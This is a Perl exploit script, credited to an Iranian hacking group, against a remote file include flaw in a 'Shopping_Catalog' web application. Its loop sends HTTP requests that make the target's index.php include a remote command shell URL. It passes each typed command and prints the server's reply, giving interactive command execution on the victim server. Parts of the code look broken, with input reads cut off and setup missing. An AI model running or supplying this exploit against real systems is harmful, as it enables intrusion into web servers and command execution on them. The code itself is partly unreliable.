#!/usr/bin/perl ################################################################################################ # # # Shopping_Catalog # # # # Class: Remote File Include Vulnerability # # Expl0iter by .... : the_Edit0r # # Location : Iran # # Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8) # # We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r # # D3vil_B0y_ir , Tornado , DarkAngel , Behbood # # ";$cmd = ; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; print $socket "GET ".$path."index.php?function=custom&custom=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print " "; $cmd = ; }